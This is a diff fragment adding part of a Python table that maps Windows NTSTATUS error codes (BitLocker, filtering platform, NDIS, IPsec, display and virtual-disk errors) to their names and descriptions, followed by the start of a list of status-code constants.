+ 0xC01E051C: ("STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS","The DxgkDdiOPMGetCOPPCompatibleInformation, DxgkDdiOPMGetInformation, or DxgkDdiOPMConfigureProtectedOutput function failed. This error is returned only if a protected output has OPM semantics. DxgkDdiOPMGetCOPPCompatibleInformation always returns this error if a protected output has OPM semantics. DxgkDdiOPMGetInformation returns this error code if the caller requested COPP-specific information. DxgkDdiOPMConfigureProtectedOutput returns this error when the caller tries to use a COPP-specific command."),
+ 0xC01E051D: ("STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST","The DxgkDdiOPMGetInformation and DxgkDdiOPMGetCOPPCompatibleInformation functions return this error code if the passed-in sequence number is not the expected sequence number or the passed-in OMAC value is invalid."),
+ 0xC01E051E: ("STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR","The function failed because an unexpected error occurred inside a display driver."),
+ 0xC01E051F: ("STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS","The DxgkDdiOPMGetCOPPCompatibleInformation, DxgkDdiOPMGetInformation, or DxgkDdiOPMConfigureProtectedOutput function failed. This error is returned only if a protected output has COPP semantics. DxgkDdiOPMGetCOPPCompatibleInformation returns this error code if the caller requested OPM-specific information. DxgkDdiOPMGetInformation always returns this error if a protected output has COPP semantics. DxgkDdiOPMConfigureProtectedOutput returns this error when the caller tries to use an OPM-specific command."),
+ 0xC01E0520: ("STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED","The DxgkDdiOPMGetCOPPCompatibleInformation and DxgkDdiOPMConfigureProtectedOutput functions return this error if the display driver does not support the DXGKMDT_OPM_GET_ACP_AND_CGMSA_SIGNALING and DXGKMDT_OPM_SET_ACP_AND_CGMSA_SIGNALING GUIDs."),
+ 0xC01E0521: ("STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST","The DxgkDdiOPMConfigureProtectedOutput function returns this error code if the passed-in sequence number is not the expected sequence number or the passed-in OMAC value is invalid."),
+ 0xC01E0580: ("STATUS_GRAPHICS_I2C_NOT_SUPPORTED","The monitor connected to the specified video output does not have an I2C bus."),
+ 0xC01E0581: ("STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST","No device on the I2C bus has the specified address."),
+ 0xC01E0582: ("STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA","An error occurred while transmitting data to the device on the I2C bus."),
+ 0xC01E0583: ("STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA","An error occurred while receiving data from the device on the I2C bus."),
+ 0xC01E0584: ("STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED","The monitor does not support the specified VCP code."),
+ 0xC01E0585: ("STATUS_GRAPHICS_DDCCI_INVALID_DATA","The data received from the monitor is invalid."),
+ 0xC01E0586: ("STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE","A function call failed because a monitor returned an invalid timing status byte when the operating system used the DDC/CI get timing report and timing message command to get a timing report from a monitor."),
+ 0xC01E0587: ("STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING","A monitor returned a DDC/CI capabilities string that did not comply with the ACCESS.bus 3.0, DDC/CI 1.1, or MCCS 2 Revision 1 specification."),
+ 0xC01E0588: ("STATUS_GRAPHICS_MCA_INTERNAL_ERROR","An internal error caused an operation to fail."),
+ 0xC01E0589: ("STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND","An operation failed because a DDC/CI message had an invalid value in its command field."),
+ 0xC01E058A: ("STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH","This error occurred because a DDC/CI message had an invalid value in its length field."),
+ 0xC01E058B: ("STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM","This error occurred because the value in a DDC/CI message's checksum field did not match the message's computed checksum value. This error implies that the data was corrupted while it was being transmitted from a monitor to a computer."),
+ 0xC01E058C: ("STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE","This function failed because an invalid monitor handle was passed to it."),
+ 0xC01E058D: ("STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS","The operating system asynchronously destroyed the monitor that corresponds to this handle because the operating system's state changed. This error typically occurs because the monitor PDO associated with this handle was removed or stopped, or a display mode change occurred. A display mode change occurs when Windows sends a WM_DISPLAYCHANGE message to applications."),
+ 0xC01E05E0: ("STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED","This function can be used only if a program is running in the local console session. It cannot be used if a program is running on a remote desktop session or on a terminal server session."),
+ 0xC01E05E1: ("STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME","This function cannot find an actual GDI display device that corresponds to the specified GDI display device name."),
+ 0xC01E05E2: ("STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP","The function failed because the specified GDI display device was not attached to the Windows desktop."),
+ 0xC01E05E3: ("STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED","This function does not support GDI mirroring display devices because GDI mirroring display devices do not have any physical monitors associated with them."),
+ 0xC01E05E4: ("STATUS_GRAPHICS_INVALID_POINTER","The function failed because an invalid pointer parameter was passed to it. A pointer parameter is invalid if it is null, is not correctly aligned, or points to an invalid address or to a kernel mode address."),
+ 0xC01E05E5: ("STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE","This function failed because the GDI device passed to it did not have a monitor associated with it."),
+ 0xC01E05E6: ("STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL","An array passed to the function cannot hold all of the data that the function must copy into the array."),
+ 0xC01E05E7: ("STATUS_GRAPHICS_INTERNAL_ERROR","An internal error caused an operation to fail."),
+ 0xC01E05E8: ("STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS","The function failed because the current session is changing its type. This function cannot be called when the current session is changing its type. Three types of sessions currently exist: console, disconnected, and remote (RDP or ICA)."),
+ 0xC0210000: ("STATUS_FVE_LOCKED_VOLUME","The volume must be unlocked before it can be used."),
+ 0xC0210001: ("STATUS_FVE_NOT_ENCRYPTED","The volume is fully decrypted and no key is available."),
+ 0xC0210002: ("STATUS_FVE_BAD_INFORMATION","The control block for the encrypted volume is not valid."),
+ 0xC0210003: ("STATUS_FVE_TOO_SMALL","Not enough free space remains on the volume to allow encryption."),
+ 0xC0210004: ("STATUS_FVE_FAILED_WRONG_FS","The partition cannot be encrypted because the file system is not supported."),
+ 0xC0210005: ("STATUS_FVE_FAILED_BAD_FS","The file system is inconsistent. Run the Check Disk utility."),
+ 0xC0210006: ("STATUS_FVE_FS_NOT_EXTENDED","The file system does not extend to the end of the volume."),
+ 0xC0210007: ("STATUS_FVE_FS_MOUNTED","This operation cannot be performed while a file system is mounted on the volume."),
+ 0xC0210008: ("STATUS_FVE_NO_LICENSE","BitLocker Drive Encryption is not included with this version of Windows."),
+ 0xC0210009: ("STATUS_FVE_ACTION_NOT_ALLOWED","The requested action was denied by the FVE control engine."),
+ 0xC021000A: ("STATUS_FVE_BAD_DATA","The data supplied is malformed."),
+ 0xC021000B: ("STATUS_FVE_VOLUME_NOT_BOUND","The volume is not bound to the system."),
+ 0xC021000C: ("STATUS_FVE_NOT_DATA_VOLUME","The volume specified is not a data volume."),
+ 0xC021000D: ("STATUS_FVE_CONV_READ_ERROR","A read operation failed while converting the volume."),
+ 0xC021000E: ("STATUS_FVE_CONV_WRITE_ERROR","A write operation failed while converting the volume."),
+ 0xC021000F: ("STATUS_FVE_OVERLAPPED_UPDATE","The control block for the encrypted volume was updated by another thread. Try again."),
+ 0xC0210010: ("STATUS_FVE_FAILED_SECTOR_SIZE","The volume encryption algorithm cannot be used on this sector size."),
+ 0xC0210011: ("STATUS_FVE_FAILED_AUTHENTICATION","BitLocker recovery authentication failed."),
+ 0xC0210012: ("STATUS_FVE_NOT_OS_VOLUME","The volume specified is not the boot operating system volume."),
+ 0xC0210013: ("STATUS_FVE_KEYFILE_NOT_FOUND","The BitLocker startup key or recovery password could not be read from external media."),
+ 0xC0210014: ("STATUS_FVE_KEYFILE_INVALID","The BitLocker startup key or recovery password file is corrupt or invalid."),
+ 0xC0210015: ("STATUS_FVE_KEYFILE_NO_VMK","The BitLocker encryption key could not be obtained from the startup key or the recovery password."),
+ 0xC0210016: ("STATUS_FVE_TPM_DISABLED","The TPM is disabled."),
+ 0xC0210017: ("STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO","The authorization data for the SRK of the TPM is not zero."),
+ 0xC0210018: ("STATUS_FVE_TPM_INVALID_PCR","The system boot information changed or the TPM locked out access to BitLocker encryption keys until the computer is restarted."),
+ 0xC0210019: ("STATUS_FVE_TPM_NO_VMK","The BitLocker encryption key could not be obtained from the TPM."),
+ 0xC021001A: ("STATUS_FVE_PIN_INVALID","The BitLocker encryption key could not be obtained from the TPM and PIN."),
+ 0xC021001B: ("STATUS_FVE_AUTH_INVALID_APPLICATION","A boot application hash does not match the hash computed when BitLocker was turned on."),
+ 0xC021001C: ("STATUS_FVE_AUTH_INVALID_CONFIG","The Boot Configuration Data (BCD) settings are not supported or have changed because BitLocker was enabled."),
+ 0xC021001D: ("STATUS_FVE_DEBUGGER_ENABLED","Boot debugging is enabled. Run Windows Boot Configuration Data Store Editor (bcdedit.exe) to turn it off."),
+ 0xC021001E: ("STATUS_FVE_DRY_RUN_FAILED","The BitLocker encryption key could not be obtained."),
+ 0xC021001F: ("STATUS_FVE_BAD_METADATA_POINTER","The metadata disk region pointer is incorrect."),
+ 0xC0210020: ("STATUS_FVE_OLD_METADATA_COPY","The backup copy of the metadata is out of date."),
+ 0xC0210021: ("STATUS_FVE_REBOOT_REQUIRED","No action was taken because a system restart is required."),
+ 0xC0210022: ("STATUS_FVE_RAW_ACCESS","No action was taken because BitLocker Drive Encryption is in RAW access mode."),
+ 0xC0210023: ("STATUS_FVE_RAW_BLOCKED","BitLocker Drive Encryption cannot enter RAW access mode for this volume."),
+ 0xC0210026: ("STATUS_FVE_NO_FEATURE_LICENSE","This feature of BitLocker Drive Encryption is not included with this version of Windows."),
+ 0xC0210027: ("STATUS_FVE_POLICY_USER_DISABLE_RDV_NOT_ALLOWED","Group policy does not permit turning off BitLocker Drive Encryption on roaming data volumes."),
+ 0xC0210028: ("STATUS_FVE_CONV_RECOVERY_FAILED","Bitlocker Drive Encryption failed to recover from aborted conversion. This could be due to either all conversion logs being corrupted or the media being write-protected."),
+ 0xC0210029: ("STATUS_FVE_VIRTUALIZED_SPACE_TOO_BIG","The requested virtualization size is too big."),
+ 0xC0210030: ("STATUS_FVE_VOLUME_TOO_SMALL","The drive is too small to be protected using BitLocker Drive Encryption."),
+ 0xC0220001: ("STATUS_FWP_CALLOUT_NOT_FOUND","The callout does not exist."),
+ 0xC0220002: ("STATUS_FWP_CONDITION_NOT_FOUND","The filter condition does not exist."),
+ 0xC0220003: ("STATUS_FWP_FILTER_NOT_FOUND","The filter does not exist."),
+ 0xC0220004: ("STATUS_FWP_LAYER_NOT_FOUND","The layer does not exist."),
+ 0xC0220005: ("STATUS_FWP_PROVIDER_NOT_FOUND","The provider does not exist."),
+ 0xC0220006: ("STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND","The provider context does not exist."),
+ 0xC0220007: ("STATUS_FWP_SUBLAYER_NOT_FOUND","The sublayer does not exist."),
+ 0xC0220008: ("STATUS_FWP_NOT_FOUND","The object does not exist."),
+ 0xC0220009: ("STATUS_FWP_ALREADY_EXISTS","An object with that GUID or LUID already exists."),
+ 0xC022000A: ("STATUS_FWP_IN_USE","The object is referenced by other objects and cannot be deleted."),
+ 0xC022000B: ("STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS","The call is not allowed from within a dynamic session."),
+ 0xC022000C: ("STATUS_FWP_WRONG_SESSION","The call was made from the wrong session and cannot be completed."),
+ 0xC022000D: ("STATUS_FWP_NO_TXN_IN_PROGRESS","The call must be made from within an explicit transaction."),
+ 0xC022000E: ("STATUS_FWP_TXN_IN_PROGRESS","The call is not allowed from within an explicit transaction."),
+ 0xC022000F: ("STATUS_FWP_TXN_ABORTED","The explicit transaction has been forcibly canceled."),
+ 0xC0220010: ("STATUS_FWP_SESSION_ABORTED","The session has been canceled."),
+ 0xC0220011: ("STATUS_FWP_INCOMPATIBLE_TXN","The call is not allowed from within a read-only transaction."),
+ 0xC0220012: ("STATUS_FWP_TIMEOUT","The call timed out while waiting to acquire the transaction lock."),
+ 0xC0220013: ("STATUS_FWP_NET_EVENTS_DISABLED","The collection of network diagnostic events is disabled."),
+ 0xC0220014: ("STATUS_FWP_INCOMPATIBLE_LAYER","The operation is not supported by the specified layer."),
+ 0xC0220015: ("STATUS_FWP_KM_CLIENTS_ONLY","The call is allowed for kernel-mode callers only."),
+ 0xC0220016: ("STATUS_FWP_LIFETIME_MISMATCH","The call tried to associate two objects with incompatible lifetimes."),
+ 0xC0220017: ("STATUS_FWP_BUILTIN_OBJECT","The object is built-in and cannot be deleted."),
+ 0xC0220018: ("STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS","The maximum number of boot-time filters has been reached."),
+ 0xC0220018: ("STATUS_FWP_TOO_MANY_CALLOUTS","The maximum number of callouts has been reached."),
+ 0xC0220019: ("STATUS_FWP_NOTIFICATION_DROPPED","A notification could not be delivered because a message queue has reached maximum capacity."),
+ 0xC022001A: ("STATUS_FWP_TRAFFIC_MISMATCH","The traffic parameters do not match those for the security association context."),
+ 0xC022001B: ("STATUS_FWP_INCOMPATIBLE_SA_STATE","The call is not allowed for the current security association state."),
+ 0xC022001C: ("STATUS_FWP_NULL_POINTER","A required pointer is null."),
+ 0xC022001D: ("STATUS_FWP_INVALID_ENUMERATOR","An enumerator is not valid."),
+ 0xC022001E: ("STATUS_FWP_INVALID_FLAGS","The flags field contains an invalid value."),
+ 0xC022001F: ("STATUS_FWP_INVALID_NET_MASK","A network mask is not valid."),
+ 0xC0220020: ("STATUS_FWP_INVALID_RANGE","An FWP_RANGE is not valid."),
+ 0xC0220021: ("STATUS_FWP_INVALID_INTERVAL","The time interval is not valid."),
+ 0xC0220022: ("STATUS_FWP_ZERO_LENGTH_ARRAY","An array that must contain at least one element has a zero length."),
+ 0xC0220023: ("STATUS_FWP_NULL_DISPLAY_NAME","The displayData.name field cannot be null."),
+ 0xC0220024: ("STATUS_FWP_INVALID_ACTION_TYPE","The action type is not one of the allowed action types for a filter."),
+ 0xC0220025: ("STATUS_FWP_INVALID_WEIGHT","The filter weight is not valid."),
+ 0xC0220026: ("STATUS_FWP_MATCH_TYPE_MISMATCH","A filter condition contains a match type that is not compatible with the operands."),
+ 0xC0220027: ("STATUS_FWP_TYPE_MISMATCH","An FWP_VALUE or FWPM_CONDITION_VALUE is of the wrong type."),
+ 0xC0220028: ("STATUS_FWP_OUT_OF_BOUNDS","An integer value is outside the allowed range."),
+ 0xC0220029: ("STATUS_FWP_RESERVED","A reserved field is nonzero."),
+ 0xC022002A: ("STATUS_FWP_DUPLICATE_CONDITION","A filter cannot contain multiple conditions operating on a single field."),
+ 0xC022002B: ("STATUS_FWP_DUPLICATE_KEYMOD","A policy cannot contain the same keying module more than once."),
+ 0xC022002C: ("STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER","The action type is not compatible with the layer."),
+ 0xC022002D: ("STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER","The action type is not compatible with the sublayer."),
+ 0xC022002E: ("STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER","The raw context or the provider context is not compatible with the layer."),
+ 0xC022002F: ("STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT","The raw context or the provider context is not compatible with the callout."),
+ 0xC0220030: ("STATUS_FWP_INCOMPATIBLE_AUTH_METHOD","The authentication method is not compatible with the policy type."),
+ 0xC0220031: ("STATUS_FWP_INCOMPATIBLE_DH_GROUP","The Diffie-Hellman group is not compatible with the policy type."),
+ 0xC0220032: ("STATUS_FWP_EM_NOT_SUPPORTED","An IKE policy cannot contain an Extended Mode policy."),
+ 0xC0220033: ("STATUS_FWP_NEVER_MATCH","The enumeration template or subscription will never match any objects."),
+ 0xC0220034: ("STATUS_FWP_PROVIDER_CONTEXT_MISMATCH","The provider context is of the wrong type."),
+ 0xC0220035: ("STATUS_FWP_INVALID_PARAMETER","The parameter is incorrect."),
+ 0xC0220036: ("STATUS_FWP_TOO_MANY_SUBLAYERS","The maximum number of sublayers has been reached."),
+ 0xC0220037: ("STATUS_FWP_CALLOUT_NOTIFICATION_FAILED","The notification function for a callout returned an error."),
+ 0xC0220038: ("STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG","The IPsec authentication configuration is not compatible with the authentication type."),
+ 0xC0220039: ("STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG","The IPsec cipher configuration is not compatible with the cipher type."),
+ 0xC022003C: ("STATUS_FWP_DUPLICATE_AUTH_METHOD","A policy cannot contain the same auth method more than once."),
+ 0xC0220100: ("STATUS_FWP_TCPIP_NOT_READY","The TCP/IP stack is not ready."),
+ 0xC0220101: ("STATUS_FWP_INJECT_HANDLE_CLOSING","The injection handle is being closed by another thread."),
+ 0xC0220102: ("STATUS_FWP_INJECT_HANDLE_STALE","The injection handle is stale."),
+ 0xC0220103: ("STATUS_FWP_CANNOT_PEND","The classify cannot be pended."),
+ 0xC0230002: ("STATUS_NDIS_CLOSING","The binding to the network interface is being closed."),
+ 0xC0230004: ("STATUS_NDIS_BAD_VERSION","An invalid version was specified."),
+ 0xC0230005: ("STATUS_NDIS_BAD_CHARACTERISTICS","An invalid characteristics table was used."),
+ 0xC0230006: ("STATUS_NDIS_ADAPTER_NOT_FOUND","Failed to find the network interface or the network interface is not ready."),
+ 0xC0230007: ("STATUS_NDIS_OPEN_FAILED","Failed to open the network interface."),
+ 0xC0230008: ("STATUS_NDIS_DEVICE_FAILED","The network interface has encountered an internal unrecoverable failure."),
+ 0xC0230009: ("STATUS_NDIS_MULTICAST_FULL","The multicast list on the network interface is full."),
+ 0xC023000A: ("STATUS_NDIS_MULTICAST_EXISTS","An attempt was made to add a duplicate multicast address to the list."),
+ 0xC023000B: ("STATUS_NDIS_MULTICAST_NOT_FOUND","At attempt was made to remove a multicast address that was never added."),
+ 0xC023000C: ("STATUS_NDIS_REQUEST_ABORTED","The network interface aborted the request."),
+ 0xC023000D: ("STATUS_NDIS_RESET_IN_PROGRESS","The network interface cannot process the request because it is being reset."),
+ 0xC023000F: ("STATUS_NDIS_INVALID_PACKET","An attempt was made to send an invalid packet on a network interface."),
+ 0xC0230010: ("STATUS_NDIS_INVALID_DEVICE_REQUEST","The specified request is not a valid operation for the target device."),
+ 0xC0230011: ("STATUS_NDIS_ADAPTER_NOT_READY","The network interface is not ready to complete this operation."),
+ 0xC0230014: ("STATUS_NDIS_INVALID_LENGTH","The length of the buffer submitted for this operation is not valid."),
+ 0xC0230015: ("STATUS_NDIS_INVALID_DATA","The data used for this operation is not valid."),
+ 0xC0230016: ("STATUS_NDIS_BUFFER_TOO_SHORT","The length of the submitted buffer for this operation is too small."),
+ 0xC0230017: ("STATUS_NDIS_INVALID_OID","The network interface does not support this object identifier."),
+ 0xC0230018: ("STATUS_NDIS_ADAPTER_REMOVED","The network interface has been removed."),
+ 0xC0230019: ("STATUS_NDIS_UNSUPPORTED_MEDIA","The network interface does not support this media type."),
+ 0xC023001A: ("STATUS_NDIS_GROUP_ADDRESS_IN_USE","An attempt was made to remove a token ring group address that is in use by other components."),
+ 0xC023001B: ("STATUS_NDIS_FILE_NOT_FOUND","An attempt was made to map a file that cannot be found."),
+ 0xC023001C: ("STATUS_NDIS_ERROR_READING_FILE","An error occurred while NDIS tried to map the file."),
+ 0xC023001D: ("STATUS_NDIS_ALREADY_MAPPED","An attempt was made to map a file that is already mapped."),
+ 0xC023001E: ("STATUS_NDIS_RESOURCE_CONFLICT","An attempt to allocate a hardware resource failed because the resource is used by another component."),
+ 0xC023001F: ("STATUS_NDIS_MEDIA_DISCONNECTED","The I/O operation failed because the network media is disconnected or the wireless access point is out of range."),
+ 0xC0230022: ("STATUS_NDIS_INVALID_ADDRESS","The network address used in the request is invalid."),
+ 0xC023002A: ("STATUS_NDIS_PAUSED","The offload operation on the network interface has been paused."),
+ 0xC023002B: ("STATUS_NDIS_INTERFACE_NOT_FOUND","The network interface was not found."),
+ 0xC023002C: ("STATUS_NDIS_UNSUPPORTED_REVISION","The revision number specified in the structure is not supported."),
+ 0xC023002D: ("STATUS_NDIS_INVALID_PORT","The specified port does not exist on this network interface."),
+ 0xC023002E: ("STATUS_NDIS_INVALID_PORT_STATE","The current state of the specified port on this network interface does not support the requested operation."),
+ 0xC023002F: ("STATUS_NDIS_LOW_POWER_STATE","The miniport adapter is in a lower power state."),
+ 0xC02300BB: ("STATUS_NDIS_NOT_SUPPORTED","The network interface does not support this request."),
+ 0xC023100F: ("STATUS_NDIS_OFFLOAD_POLICY","The TCP connection is not offloadable because of a local policy setting."),
+ 0xC0231012: ("STATUS_NDIS_OFFLOAD_CONNECTION_REJECTED","The TCP connection is not offloadable by the Chimney offload target."),
+ 0xC0231013: ("STATUS_NDIS_OFFLOAD_PATH_REJECTED","The IP Path object is not in an offloadable state."),
+ 0xC0232000: ("STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED","The wireless LAN interface is in auto-configuration mode and does not support the requested parameter change operation."),
+ 0xC0232001: ("STATUS_NDIS_DOT11_MEDIA_IN_USE","The wireless LAN interface is busy and cannot perform the requested operation."),
+ 0xC0232002: ("STATUS_NDIS_DOT11_POWER_STATE_INVALID","The wireless LAN interface is power down and does not support the requested operation."),
+ 0xC0232003: ("STATUS_NDIS_PM_WOL_PATTERN_LIST_FULL","The list of wake on LAN patterns is full."),
+ 0xC0232004: ("STATUS_NDIS_PM_PROTOCOL_OFFLOAD_LIST_FULL","The list of low power protocol offloads is full."),
+ 0xC0360001: ("STATUS_IPSEC_BAD_SPI","The SPI in the packet does not match a valid IPsec SA."),
+ 0xC0360002: ("STATUS_IPSEC_SA_LIFETIME_EXPIRED","The packet was received on an IPsec SA whose lifetime has expired."),
+ 0xC0360003: ("STATUS_IPSEC_WRONG_SA","The packet was received on an IPsec SA that does not match the packet characteristics."),
+ 0xC0360004: ("STATUS_IPSEC_REPLAY_CHECK_FAILED","The packet sequence number replay check failed."),
+ 0xC0360005: ("STATUS_IPSEC_INVALID_PACKET","The IPsec header and/or trailer in the packet is invalid."),
+ 0xC0360006: ("STATUS_IPSEC_INTEGRITY_CHECK_FAILED","The IPsec integrity check failed."),
+ 0xC0360007: ("STATUS_IPSEC_CLEAR_TEXT_DROP","IPsec dropped a clear text packet."),
+ 0xC0360008: ("STATUS_IPSEC_AUTH_FIREWALL_DROP","IPsec dropped an incoming ESP packet in authenticated firewall mode. This drop is benign."),
+ 0xC0360009: ("STATUS_IPSEC_THROTTLE_DROP","IPsec dropped a packet due to DOS throttle."),
+ 0xC0368000: ("STATUS_IPSEC_DOSP_BLOCK","IPsec Dos Protection matched an explicit block rule."),
+ 0xC0368001: ("STATUS_IPSEC_DOSP_RECEIVED_MULTICAST","IPsec Dos Protection received an IPsec specific multicast packet which is not allowed."),
+ 0xC0368002: ("STATUS_IPSEC_DOSP_INVALID_PACKET","IPsec Dos Protection received an incorrectly formatted packet."),
+ 0xC0368003: ("STATUS_IPSEC_DOSP_STATE_LOOKUP_FAILED","IPsec Dos Protection failed to lookup state."),
+ 0xC0368004: ("STATUS_IPSEC_DOSP_MAX_ENTRIES","IPsec Dos Protection failed to create state because there are already maximum number of entries allowed by policy."),
+ 0xC0368005: ("STATUS_IPSEC_DOSP_KEYMOD_NOT_ALLOWED","IPsec Dos Protection received an IPsec negotiation packet for a keying module which is not allowed by policy."),
+ 0xC0368006: ("STATUS_IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES","IPsec Dos Protection failed to create per internal IP ratelimit queue because there is already maximum number of queues allowed by policy."),
+ 0xC038005B: ("STATUS_VOLMGR_MIRROR_NOT_SUPPORTED","The system does not support mirrored volumes."),
+ 0xC038005C: ("STATUS_VOLMGR_RAID5_NOT_SUPPORTED","The system does not support RAID-5 volumes."),
+ 0xC03A0014: ("STATUS_VIRTDISK_PROVIDER_NOT_FOUND","A virtual disk support provider for the specified file was not found."),
+ 0xC03A0015: ("STATUS_VIRTDISK_NOT_VIRTUAL_DISK","The specified disk is not a virtual disk."),
+ 0xC03A0016: ("STATUS_VHD_PARENT_VHD_ACCESS_DENIED","The chain of virtual hard disks is inaccessible. The process has not been granted access rights to the parent virtual hard disk for the differencing disk."),
+ 0xC03A0017: ("STATUS_VHD_CHILD_PARENT_SIZE_MISMATCH","The chain of virtual hard disks is corrupted. There is a mismatch in the virtual sizes of the parent virtual hard disk and differencing disk."),
+ 0xC03A0018: ("STATUS_VHD_DIFFERENCING_CHAIN_CYCLE_DETECTED","The chain of virtual hard disks is corrupted. A differencing disk is indicated in its own parent chain."),
+ 0xC03A0019: ("STATUS_VHD_DIFFERENCING_CHAIN_ERROR_IN_PARENT","The chain of virtual hard disks is inaccessible. There was an error opening a virtual hard disk further up the chain."),
+}
+
+# Error Codes
+
+STATUS_SUCCESS = 0x00000000
+STATUS_WAIT_1 = 0x00000001
+STATUS_WAIT_2 = 0x00000002
+STATUS_WAIT_3 = 0x00000003
+STATUS_WAIT_63 = 0x0000003F
+STATUS_ABANDONED = 0x00000080
+STATUS_ABANDONED_WAIT_0 = 0x00000080
+STATUS_ABANDONED_WAIT_63 = 0x000000BF
+STATUS_USER_APC = 0x000000C0
+STATUS_ALERTED = 0x00000101
+STATUS_TIMEOUT = 0x00000102
+STATUS_PENDING = 0x00000103
+STATUS_REPARSE = 0x00000104
+STATUS_MORE_ENTRIES = 0x00000105
+STATUS_NOT_ALL_ASSIGNED = 0x00000106
+STATUS_SOME_NOT_MAPPED = 0x00000107
+STATUS_OPLOCK_BREAK_IN_PROGRESS = 0x00000108
+STATUS_VOLUME_MOUNTED = 0x00000109
+STATUS_RXACT_COMMITTED = 0x0000010A
+STATUS_NOTIFY_CLEANUP = 0x0000010B
+STATUS_NOTIFY_ENUM_DIR = 0x0000010C
+STATUS_NO_QUOTAS_FOR_ACCOUNT = 0x0000010D
+STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED = 0x0000010E
+STATUS_PAGE_FAULT_TRANSITION = 0x00000110
+STATUS_PAGE_FAULT_DEMAND_ZERO = 0x00000111
+STATUS_PAGE_FAULT_COPY_ON_WRITE = 0x00000112
+STATUS_PAGE_FAULT_GUARD_PAGE = 0x00000113
+STATUS_PAGE_FAULT_PAGING_FILE = 0x00000114
+STATUS_CACHE_PAGE_LOCKED = 0x00000115
+STATUS_CRASH_DUMP = 0x00000116
+STATUS_BUFFER_ALL_ZEROS = 0x00000117
+STATUS_REPARSE_OBJECT = 0x00000118
+STATUS_RESOURCE_REQUIREMENTS_CHANGED = 0x00000119
+STATUS_TRANSLATION_COMPLETE = 0x00000120
+STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY = 0x00000121
+STATUS_NOTHING_TO_TERMINATE = 0x00000122
+STATUS_PROCESS_NOT_IN_JOB = 0x00000123
+STATUS_PROCESS_IN_JOB = 0x00000124
+STATUS_VOLSNAP_HIBERNATE_READY = 0x00000125
+STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY = 0x00000126
+STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED = 0x00000127
+STATUS_INTERRUPT_STILL_CONNECTED = 0x00000128
+STATUS_PROCESS_CLONED = 0x00000129
+STATUS_FILE_LOCKED_WITH_ONLY_READERS = 0x0000012A
+STATUS_FILE_LOCKED_WITH_WRITERS = 0x0000012B
+STATUS_RESOURCEMANAGER_READ_ONLY = 0x00000202
+STATUS_WAIT_FOR_OPLOCK = 0x00000367
+DBG_EXCEPTION_HANDLED = 0x00010001
+DBG_CONTINUE = 0x00010002
+STATUS_FLT_IO_COMPLETE = 0x001C0001
+STATUS_FILE_NOT_AVAILABLE = 0xC0000467
+STATUS_CALLBACK_RETURNED_THREAD_AFFINITY = 0xC0000721
+STATUS_OBJECT_NAME_EXISTS = 0x40000000
+STATUS_THREAD_WAS_SUSPENDED = 0x40000001
+STATUS_WORKING_SET_LIMIT_RANGE = 0x40000002
+STATUS_IMAGE_NOT_AT_BASE = 0x40000003
+STATUS_RXACT_STATE_CREATED = 0x40000004
+STATUS_SEGMENT_NOTIFICATION = 0x40000005
+STATUS_LOCAL_USER_SESSION_KEY = 0x40000006
+STATUS_BAD_CURRENT_DIRECTORY = 0x40000007
+STATUS_SERIAL_MORE_WRITES = 0x40000008
+STATUS_REGISTRY_RECOVERED = 0x40000009
+STATUS_FT_READ_RECOVERY_FROM_BACKUP = 0x4000000A
+STATUS_FT_WRITE_RECOVERY = 0x4000000B
+STATUS_SERIAL_COUNTER_TIMEOUT = 0x4000000C
+STATUS_NULL_LM_PASSWORD = 0x4000000D
+STATUS_IMAGE_MACHINE_TYPE_MISMATCH = 0x4000000E
+STATUS_RECEIVE_PARTIAL = 0x4000000F
+STATUS_RECEIVE_EXPEDITED = 0x40000010
+STATUS_RECEIVE_PARTIAL_EXPEDITED = 0x40000011
+STATUS_EVENT_DONE = 0x40000012
+STATUS_EVENT_PENDING = 0x40000013
+STATUS_CHECKING_FILE_SYSTEM = 0x40000014
+STATUS_FATAL_APP_EXIT = 0x40000015
+STATUS_PREDEFINED_HANDLE = 0x40000016
+STATUS_WAS_UNLOCKED = 0x40000017
+STATUS_SERVICE_NOTIFICATION = 0x40000018
+STATUS_WAS_LOCKED = 0x40000019
